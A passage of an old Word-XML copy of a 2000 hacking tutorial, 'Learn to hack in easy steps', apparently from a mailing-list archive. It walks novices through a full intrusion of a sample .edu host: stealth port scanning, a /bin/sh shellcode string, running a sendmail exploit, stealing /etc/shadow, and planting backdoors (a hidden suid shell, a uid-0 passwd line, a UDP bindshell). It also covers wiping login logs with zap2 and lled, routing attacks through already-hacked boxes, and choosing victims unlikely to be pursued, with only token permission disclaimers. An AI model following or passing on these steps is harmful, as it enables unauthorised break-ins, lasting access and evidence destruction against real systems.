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ow to learn to hack in easy ste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~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Introduc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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>~~~~~~~~~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 there, I'm TDC and I'd like to give back all the things i've learnt from the hackers i'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et. I want to write this because most tutorials i've found (very good tutorials) are n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ld and don't fit just like they did before. This is why i'm going to teach you and show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way to learn to hack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f you are a hacker, you read this, and find something that's not correct or you don't lik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 want to know. mail m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'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english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 don't care at all as long as it's understandab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 this document I talk about many security tools, you can find all them and also contac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e on my site: www.3b0x.c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n you finish reading it, please TELL ME how you like it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 want to make newer versions of it, check on my site to stay inform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PYING: You're welcome to distribute this document to whoever the hell you want, post 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on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at al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If you want to perform it, ask me for permission. thanks a lot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SCLAIMER: This document is intended for ludical or educational purposes. I don't want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promote computer crime and I'm not responible of your actions in any wa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If you want to hack a computer, do the decent thing and ask for permission firs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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Let's sta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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>~~~~~~~~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f you read carefully all what i'm telling here, you are smart and you work hard on i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'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way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hacker is someone who is able to discover unknown vulnerabilities in software and able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rite the proper codes to exploit the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TE: If you've been unlucky, and before you found this document, you've reade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uides to (mostly) harmless hacking, then forget everything you think you've learnt from the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won't understand some things from my tutorial until you unpoison your brai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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Some defini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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>~~~~~~~~~~~~~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'm going to refer to every kind of computer as a box, and only as a box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includes your PC, any server, supercomputers, nuclear silos, HAL9000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chael Knight's car, The Matrix, etc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systems we're going to hack (with permission) are plenty of normal users, who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on't have any remote idea about security, and the root. The root user is call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uperuser and is used by the admin to administer the syste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'm going to refer to the users of a system as lusers. Logically, I'll refer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admin as superlus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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Operating System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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>~~~~~~~~~~~~~~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k, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x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r perhaps a mac (motorola) box running macO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can't hack with that. In order to hack, you'll need one of those UNIX derived operat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ystem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is for two main reason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the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers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so on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's bet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than running it at home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all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unle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you're running some kind of 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t's see where to find the unix you're interested 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UNIX systems may be divided in two main group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- commercial UNIX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- free opensource UNIX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commercial unix's price is not like windoze's price, and it usually can't run on your box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 forget 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free opensource UNIXes can also be divided i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- BS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These are older and difficult to use. The most secure OS (openBSD) is in this grou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You don't want them unless you're planning to install a server on the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- Lin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Easy to use, stable, secure, and optimized for your kind of box. that's what we ne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 strongly suggest you to get the SuSE distribution of Linux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It's the best one as i think, and i added here some tips for SuSE, so all should be easi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isit www.suse.de and look for a local store or order it onlin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(i know i said it the software was free, but not the CDs nor the manual nor the suppor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It is much cheaper than windoze anyway, and you are allowed to copy and distribute it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f you own an intel box, then order the PC versi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f you own a mac box, then order the PowerPC versi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atever you do, DON'T PICK THE COREL DISTRIBUTION, it suck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t's possible you have problem with your hardware on the installation. Read the manual, as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r technical support or buy new hardware, just install it as you ca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is really important! READ THE MANUAL, or even buy a UNIX book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ooks about TCP/IP and C programming are also usefu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f you don't, you won't understand some things i'll explain later. And, of course, you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ver become a hacker if you don't read a lot of that 'literature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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the Intern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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>~~~~~~~~~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es! you wanted to hack, didn't you? do you want to hack your own box or what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want to hack internet boxes! So lets connect to the intern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es, i know you've gotten this document from the internet, but that was with windoz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it was much easier. Now you're another person, someone who screams for knowledge and wisdo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're a Linux user, and you gotta open your way to the Intern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gotta make your Linux box to connect to the ne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 go and set up your modem (using YaST2 in SuSE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mon problem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f your box doesn't detect any modems, that probably means that you have no modem install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D (not a joke!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ost PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, 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pecifically designed to work ONLY on windoze. Don't blame linux, this happens because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nmodem has not a critical chip that makes it work. It works on windoze cause the vend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river emulates that missing chip. And hat vendor driver is only available for windoz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SA and external modems are more probably real modems, but not all of the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If you want to make sure wether a modem is or not a winmodem, visit </w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://start.at/modem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>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n use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial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TE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connec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ternet with aol. You can't hack with aol. i don't like aol. aol suck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on't worry, we humans are not perfect, and it's probably not your fault. If that is your cas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ave aol and get a real ISP. Then you'll be forgive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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Don't get bust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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>~~~~~~~~~~~~~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t's  suppose you haven't skipped everything below and your Linux bow is now connected to the n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t's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be saf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 Don't h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this is the most effective stealth technique. not even the FBI can bust you. :-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If you choose this option, stop reading now, cause the rest is worthless and futi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 If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, fi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your own website oe email address, find your ISP, your phone number, your home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and you get busted!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 be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking to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NEVER tell others you've hacked a box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 NEVER hack directly from your box (your_box --&gt; victim's box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Always use a third box in the middle (your_box --&gt; lame_box --&gt; victim's box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Where lame_box is a previously hacked box or...a shell account box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A shell account is a service where you get control of a box WITHOUT hacking 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There are a few places where shell accounts are given for free. One of them is nether.n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 Don't hack dangerous boxes until you're a real hack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Which boxes are dangerou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Military box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Government box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Important and powerful companies' box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Security companies' box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Which boxes are NOT dangerou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Educational boxes (any .edu domain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Little companies' box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Japanese box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 Always connect to the internet through a free and anonymous IS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(did i tell you that AOL is NOT an ISP?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 Use phreking techniques to redirect calls and use others' lines for your ISP cal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Then it'll be really difficult to trace you. This is not a guide to phreaking anywa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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TCP ports and scann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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>~~~~~~~~~~~~~~~~~~~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o you got your stealth linux box connected to the internet (not aol)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ave you read the manual as i told you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n we shall start with the damn real thin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rst of all, you should know some things about the internet. It's based on the TPC/IP protocol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and other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t works like this: every box has 65k connection PORTS. some of them are opened and waiting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r data to be sen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 you can open a connection and send data to any these ports. Those ports are associated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servic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very service is hosted by a DAEMON. Commonly, a daemon or a server is a program that ru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 the box, opens its port and offers their damn servi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re are some common ports and their usual services (there are a lot more)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rt number</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Common service</w:t>
        <w:tab/>
        <w:t>Example daemon (d stands for daemon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21</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>FTP</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>FTP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23</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Telnet</w:t>
        <w:tab/>
        <w:t>telnet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25</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>SMTP</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>sendmail (yes!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80</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>HTTP</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>apac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110</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>POP3</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>qpo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xampl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when you visit the website </w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://www.host.com/luser/index.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>, your browser does thi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it connects to the TCP port 8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it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro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(it really sends a lot of things more, but that is the essential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the host sends the html fi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cool thing of daemons is they have really serious security bug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at's why we want to know what daemons are running there, so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e need to know what ports are opened in the box we want to hack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ow could we get that information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e gotta use a scanner. A scanner is a program that tries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nnect to every port on the box and tells which of them are open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best scanner i can think of is nmap, created by Fyodo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can get nmap from my site in tarball or rpm forma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t's install nmap from an .rpm pack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ash-2.03$ rpm -i nmap-2.53-1.i386.rp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n we run i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ash-2.03$ nmap -sS target.ed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tarting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/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nteresting ports on target.edu (xx.xx.xx.xx)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(The 1518 ports scanned but not shown below are in state: closed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rt       State       Serv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21/tcp     open        ft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23/tcp     open        teln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25/tcp     open        smt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80/tcp     open        htt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110/tcp    open        pop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map run completed -- 1 IP address (1 host up) scanned in 34 secon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map has told us which ports are opened on target.edu and thus, what services it's offerin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 know, i said telnet is a service but is also a program (don't let this confuse you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program can open a TCP connection to the port you specif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 lets see what's on that port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 your linux console, typ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ash-2.03$ telnet target.edu 2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rying xx.xx.xx.xx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nnected to target.ed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scape character is '^]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220 target.edu FTP server (SunOS 5.6) read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221 Goodby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nnection closed by foreign hos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see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y speak out some valuable inform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their operating system is SunOS 5.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their FTP daemon is the standard provided by the O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ash-2.03$ telnet target.edu 2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rying xx.xx.xx.xx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nnected to target.ed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scape character is '^]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220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -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400 (EDT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221 2.0.0 target.edu closing connec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nnection closed by foreign hos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y like to tell us everything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their SMTP daemon is sendma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its version is 8.11.0/8.9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xperiment with other ports to discover other daemon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y is this information useful to us? cause the security bugs that can let us in depe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 the OS and daemons they are runnin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ut there is a problem here... such information can be faked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t's difficult to really know what daemons are they running, but we can know FOR S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at's the operating system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ash-2.03$ nmap -sS target.ed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tarting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/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nteresting ports on target.edu (xx.xx.xx.xx)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(The 1518 ports scanned but not shown below are in state: closed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rt       State       Serv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21/tcp     open        ft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23/tcp     open        teln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25/tcp     open        smt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80/tcp     open        htt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110/tcp    open        pop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CP Sequence Prediction: Class=random positive incremen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 xml:space="preserve">                   Difficulty=937544 (Good luck!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emote operating system guess: Linux 2.1.122 - 2.2.1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map run completed -- 1 IP address (1 host up) scanned in 34 secon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y wasn't it SunOS 5.6? Damn they're a bunch of lame fakers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e know the host is running the Linux 2.x kernel. It'd be useful to know also the distributio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ut the information we've already gathered should be enoug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nmap feature is cool, isn't it? So even if they've tried to fool us, we can kn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at's the OS there and its very difficult to avoid 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lso take a look to the TCP Sequence Prediction. If you scan a host and nmap tel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their difficulty is low, that means their TCP sequence is predictable and w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n make spoofing attacks. This usually happens with windoze (9x or NT) box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k, we've scanned the target. If the admins detect we've scanned them, they could get angr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we don't want the admins to get angry with us, that's why we used the -sS opti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way (most) hosts don't detect ANYTHING from the portsca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yway, scanning is LEGAL so you shouldn't have any problems with it. If you want a bet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sage of nmap's features, read its man pag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ash-2.03$ man nma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/>
        <w:t>How to upload and compile program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/>
        <w:t>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~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most obvious and simple way is using FTP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ash-2.03$ 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rogram.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h-2.03$ ftp target.ed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nnected to target.ed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220 target.edu FTP server (SunOS 5.6) read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ame: lus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331 Password required for lus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assword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230 User luser logged i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tp&gt; put program.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200 PORT command successfu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150 ASCII data connection for program.c (204.42.253.18,57982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226 Transfer complet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tp&gt; qu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221 Goodby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ut this is not a really good way. It can create logs that will make the admin to detect u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void uploading it with FTP as you can, use cut&amp;paste instea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re's how to make i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e run a text edit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h-2.03$ pico exploit.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f it doesn't work, try this on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h-2.03$ vi exploit.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f course, you must learn how to use vi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n open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x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ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut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ext from it. Change to your target and paste the code so you've 'uploaded' the fi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 cut a text from the screen, you need to install the gpm packet from your linux distributi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program lets you select and cut text with your mous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f cut&amp;paste doesn't work, you can also type it by hand (they aren't usually large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ce you get the .c file there, here's how to compil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h-2.03$ gcc program.c -o progr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execut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h-2.03$ ./progr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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Exploiting vulnerabiliti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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>~~~~~~~~~~~~~~~~~~~~~~~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is the most important part of our hacking experience. Once we know what target.ed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s running, we can go to one of those EXPLOIT databases that are on the n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exploit is a piece of code that exploits a vulnerability on its software. In the case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rget.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daem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at fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most eas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xploitable. If your target gots an old version, you'll probably get in easyl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n we exploit a security bug, we can ge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 a normal shell (don't know what a shell is? read a book of unix!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shell is a command interpreter. for example, the windoze 'shell' is the command.com fi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one lets us send commands to the box, but we got limited priviledg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 a root she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is our goal, once we're root, we can do EVERYTHING on our 'rooted' box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se are some exploit databases i suggest you to visi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ww.hack.co.z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ww.r00tabega.or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ww.rootshell.c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ww.securityfocus.c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ww.insecure.org/sploits.htm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very exploit is different to use, so read its text and try the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y usually come in .c languag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most standar and easy to use exploits are buffer overflow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I won't explain here how a buffer overflow does work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ad "Smash The Stack For Fun And Profit" by Aleph One to learn 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can download it from my site. (www.3b0x.com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uffer overflows fool a program (in this case sendmail) to make it execute the code you wan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code usually executes a shell, so it's called 'shellcode'. The shellcode to run a she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s different to every OS, so this is a strong reason to know what OS they're runnin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e edit the .c file we've downloaded and look for something like thi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ar shellcode[] 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"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b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"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd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"\x80\xe8\xdc\xff\xff\xff/bin/sh"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is a shellcode for Linux. It will execute /bin/sh, that is, a shel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gotta replace it by the shellcode for the OS your target is runnin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can find shellcodes for most OSes on my site or create your own by read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text i mentioned before (Smash The Stack For Fun And Profit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MPORTANT: before continuing with the practice, ask your target for permission to hack the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if they let you do it, then you shall continu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if they don't give you permission, STOP HERE and try with another on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shall you continue without their permission, you'd be inquiring law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i'm not responible of your craziness in any way!!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should have now the shell account, this is the time to use it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verything i explain on this section, do it through your shell accoun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ash-2.03$ telnet myshellaccount 2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rying xx.xx.xx.xx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nnected to yourshellaccoun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scape character is '^]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Welcome to yourshellaccou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login: maliciousus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Password: (it doesn't display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Last login: Fry Sep 15 11:45:34 from &lt;yourIPaddress&gt;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h-2.03$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re is a example of a buffer overflow (that doesn't really exist)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e compile i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h-2.03$ gcc exploit.c -o explo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e execute i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h-2.03$ ./explo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his is a sendmail 8.9.11 explo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sage: ./exploit target po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ndmail works on port 25, so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h-2.03$./exploit 25 target.ed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ol, '$' means we got a shell! Let's find out if we're roo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$whoa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o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amn, we've rooted target.edu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$whyamiro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ecause you've hacked me! :-) (just kidding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re are some exploits that don't give you root directly, but a normal shel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t depends on what luser is running the daemon. (sendmail is usually root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n you'll have to upload a .c file with a local (local means it can't overfl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daemon, but a local program) overflow and compile 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member to avoid uploading it with FTP as you ca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ther kind of exploit is the one that gives you access to the password fi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f a host gots port 23 (telnet) opened, we can login as a normal us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remote root logins are usually not allowed) by putting his/hers/its usern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password. Then use the su command to become roo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h-2.03$ telnet target.edu 2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rying xx.xx.xx.xx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nnected to target.ed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scape character is '^]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We're running SunOS 5.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Welcome to target.edu</w:t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login: lus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Password: (it doesn't display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Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx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sh-2.03$ whoa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us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re we lusers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h-2.03$ su ro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assword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on't think so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h-2.03$ whoa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o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h-2.03$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t's see what happened. We've stolen the password file (/etc/shadow) using an explo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n, let's suppose we've extracted the password from luser and root. We can't login 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oot so we login as luser and run su. su asks us for the root password, we put it and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ooted!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problem here is that is not easy to extract a root password from a password fi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ly 1/10 admins are idiot enough to choose a crackable password like a dictinonary wo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r a person's nam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 said some admins are idiot (some of them are smart), but lusers are the more mo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diotest thing on a system. You'll find that luser's passwords are mostly easyly cracked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'll find that lusers set up rlogin doors for you to enter without a password, etc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t to mention what happens when an admin gives a normal luser administrator priviledg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th sudo or somethin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 learn how to crack a password file and extract its passwords, download a document call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cracking UNIX passwords" by Zebal. You can get it from my site (www.3b0x.com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f course, I haven't listed all the exploit kinds that exist, only the most comm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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Putting backdoo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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>~~~~~~~~~~~~~~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k, we've rooted the system. Then what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w you're able to change the webpage of that .edu box. Is that what you want to do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tice that doing such a thing is LAMER attitude. everyone out there can hack an .ed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ox, but they're not ashaming them with such thing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acktivism is good and respected. You can change the page of bad people with bad ideologi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ke nazis, scienciologists, bsa.org, microsoft, etc. Not a bunch of poor educator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MEMBER: ask for permission first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, this time you should do another thing. You should keep that system for you to play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s a toy! (remember: your_box --&gt; lame_box --&gt; victim's box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ce we type "exit" on our login shell, we're out. And we gotta repeat all the process to g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ck i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it may not be possibl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 the admin changed his password to something uncrackab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 they updated sendmail to a newer version so the exploit doesn't work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 now we're root and we can do everything, we shall put some backdoors that let us get back i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t may be interesting to read the paper about backdoors I host on my site. (www.3b0x.com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yway, i'll explain the basics of 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1.How to make a sushi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To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it su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permission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h-2.03$ cp /bin/sh /dev/nu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 the strange case the admin looks at /dev, he wouldn't find something unusual cau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dev/null does exist (who notices the difference?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h-2.03$ cd /dev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h-2.03$ chown root nu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hould yet be root-owned, but anyway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h-2.03$ chmod 4775 nu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4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywher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e've finished our 'duty', let's logou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h-2.03$ ex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n, when we come back some day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h-2.03$ whoa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us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h-2.03$ /dev/nu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h-2.03$ whoa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o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e're superluser again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re's one problem: actually most shells drop suid permissions, so the sushi doesn't work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e'd upload then the shell we want and make a sushi with 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shell we want for this is SASH. A stand-alone shell with built-in command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one doesn't drop suid perms, and the commands are built-in, so external comman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n't drop perms too! Remember to compile it for the architecture of the target box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o you know where to get sash from? From my site :-). (www.3b0x.com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2.How to add fake luser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gotta manipulate the users file: /etc/passw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ry thi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h-2.03$ pico /etc/passw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f it doesn't work, try thi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h-2.03$ vi /etc/passw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f course, you must learn how to use vi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is what a luser line looks like:  luser:passwd:uid:gid:startdir:she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n uid=0 and gid=0, that luser gets superluser priviledg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n we add a line like thi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dood::0:0:dood:/:/bin/sh        (put it in a hidden plac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, once we get a shell, we typ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h-2.03$ su doo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h-2.03$ whoa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oo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now we're root because dood's uid=0 and gid=0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mart admins usually look for anomalities on /etc/passwd. The best way is to use a fak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rogram in /bin that executes the shell you want with suid perm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 haven't got such a program at my site, but it shouldn't be difficult to develop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3.How to put a bindshel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bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell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case is this is our own daemon. The good bindshells will listen to an UDP port (not TCP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give a shell to you when you connect. The cool thing of UDP is thi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f the admin uses a scanner to see what TCP ports are open, he woldn't find anything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y rarely remember UDP exist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can get an UDP bindshell coded by !hispahack from my sit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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Cleaning u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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>~~~~~~~~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member when we logedin to target.edu as luser, and used su to become root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ke a look to this lin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Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx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es, that was displayed by the target box when we logedin ther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t refers to the last login that the real luser di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, what will be displayed when luser logsin again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Last login: Sun Sep 24 10:32:14 from &lt;yourIPaddress&gt;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n luser writes a mail to the admi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It has happen some strange thing, when I loggedin today, I've read a line like thi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Last login: Sun Sep 24 10:32:14 from &lt;yourIPaddress&gt;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Does it mean I did login yesterday? It can't be, I don't work on sundays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I think it's a bug and this is your fault.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admin responds to luser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That wasn't a bug! this line means someone acceded the system using your password, don'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worry for that, we got his IP. That means we can ask his ISP what phone number did c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at 10:32 and get &lt;yourIPaddress&gt;. Then we shall call the police and he'll get busted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 you'll get busted because luser was a bit clever (sometimes happens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 we gotta find a way to delete tha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is information can be stored in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/usr/adm/lastlo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/var/adm/lastlo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var/log/lastlo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nd we can erase it using lled (get it from my site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led gots a buitin help that explains how to use it, remember to chmod the fake fi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reated by lled like the substitute lastlog fi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re is also some information we'd like to eras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Remember when i told you not to use FTP? Well, in case you did it, you must now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se wted to clean up. Its sintax is very similar to ll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can get it from my sit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who command shows us (and the admin) which lusers are logedin at the momen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at if we login and the admin is there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h-2.03$ wh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root     tty1     Sep 25 18:18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n we shall use zap2. If you loggedin as 'luser', then typ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h-2.03$ ./zap2 lus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Zap2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h-2.03$ wh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h-2.03$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luser has never been her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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Greeting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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>~~~~~~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Ok, this is all for now (i'll make a newer version). I hope it has been useful to you and you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cide to continue learning and become a real hacker. You can visit my site (www.3b0x.com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r more advanced tutorials so you can improve your skill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'd get very happy if you send me a mail telling me your impression about this paper (we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s good or bad), and you help me to improve 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'd like to send my greetings to every hacker that has tought me in any way, through newsgrou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r other tutorials like this one. thanks to al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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>This paper was written on 26-9-00 by TDC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</w:rPr>
        <w:t>Follow-Ups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ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b/>
          </w:rPr>
          <w:t>Re: Learn to hack hotmail and icq and aol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ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>From:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> diggitydog46@hotmail.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b/>
          </w:rPr>
          <w:t>Re: Learn to hack in easy steps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ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>From:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Pornaddict2000&lt;aron_58@mail.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId6">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b/>
          </w:rPr>
          <w:t>Re: Learn to hack in easy steps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ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>From:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> asterixx@post.cz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b/>
          </w:rPr>
          <w:t>Re: Learn to hack in easy steps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ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>From:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> shane4444@hotmail.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId8">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b/>
          </w:rPr>
          <w:t>Re: Learn to hack in easy steps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ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>From:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Keith Koeppen&lt;Joy_ride80@yahoo.com&gt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v by Date: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b/>
          </w:rPr>
          <w:t>Re: i can hack hotmail for free and in minutes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xt by Date: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b/>
          </w:rPr>
          <w:t>Re: Profile of a person using hotmail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v by thread: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b/>
          </w:rPr>
          <w:t>i can´t find a hotmail password!!!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xt by thread: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b/>
          </w:rPr>
          <w:t>Re: Learn to hack in easy steps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dex(es):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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:rStyle w:val="InternetLink"/>
          <w:u w:val="single"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "../in/mail9.html" \l "01450"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:rStyle w:val="InternetLink"/>
          <w:u w:val="single"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
          <w:b/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:rStyle w:val="InternetLink"/>
          <w:u w:val="single"/>
          <w:color w:val="0000FF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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:rStyle w:val="InternetLink"/>
          <w:u w:val="single"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "../in/threads.html" \l "01450"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:rStyle w:val="InternetLink"/>
          <w:u w:val="single"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
          <w:b/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:rStyle w:val="InternetLink"/>
          <w:u w:val="single"/>
